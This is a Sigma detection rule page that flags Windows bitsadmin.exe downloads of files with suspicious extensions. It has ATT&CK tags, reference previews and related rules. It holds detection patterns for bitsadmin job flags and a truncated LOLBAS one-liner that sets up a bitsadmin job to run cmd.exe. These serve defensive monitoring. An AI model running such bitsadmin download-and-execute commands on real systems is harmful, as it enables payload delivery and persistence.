File With Suspicious Extension Downloaded Via Bitsadmin

 1title: File With Suspicious Extension Downloaded Via Bitsadmin
 2id: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200
 3status: test
 4description: Detects usage of bitsadmin downloading a file with a suspicious extension
 5references:
 6    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
 7    - https://isc.sans.edu/diary/22264
 8    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 9author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
10date: 2022/06/28
11modified: 2023/05/30
12tags:
13    - attack.defense_evasion
14    - attack.persistence
15    - attack.t1197
16    - attack.s0190
17    - attack.t1036.003
18logsource:
19    category: process_creation
20    product: windows
21detection:
22    selection_img:
23        - Image|endswith: '\bitsadmin.exe'
24        - OriginalFileName: 'bitsadmin.exe'
25    selection_flags:
26        CommandLine|contains:
27            - ' /transfer '
28            - ' /create '
29            - ' /addfile '
30    selection_extension:
31        CommandLine|contains:
32            - '.7z'
33            - '.asax'
34            - '.ashx'
35            - '.asmx'
36            - '.asp'
37            - '.aspx'
38            - '.bat'
39            - '.cfm'
40            - '.cgi'
41            - '.chm'
42            - '.cmd'
43            - '.dll'
44            - '.gif'
45            - '.jpeg'
46            - '.jpg'
47            - '.jsp'
48            - '.jspx'
49            - '.log'
50            - '.png'
51            - '.ps1'
52            - '.psm1'
53            - '.rar'
54            - '.scf'
55            - '.sct'
56            - '.txt'
57            - '.vbe'
58            - '.vbs'
59            - '.war'
60            - '.wsf'
61            - '.wsh'
62            - '.xll'
63            - '.zip'
64    condition: all of selection_*
65falsepositives:
66    - Unknown
67level: high

References

• 15 Ways to Download a File

  

  Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system.

  
  Read More

• Java Struts2 Vulnerability Used To Install Cerber Crypto Ransomware - SANS Internet Storm Center

  

  Java Struts2 Vulnerability Used To Install Cerber Crypto Ransomware, Author: Johannes Ullrich

  
  Read More

• Bitsadmin | LOLBAS

  One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. bitsadmin /create 1 & bitsadmin /addfile 1 c:\...

  
  Read More

Related rules

• File Download Via Bitsadmin To A Suspicious Target Folder
• Suspicious Download From File-Sharing Website Via Bitsadmin
• File Download Via Bitsadmin To An Uncommon Target Folder
• Suspicious Download From Direct IP Via Bitsadmin
• File Download Via Bitsadmin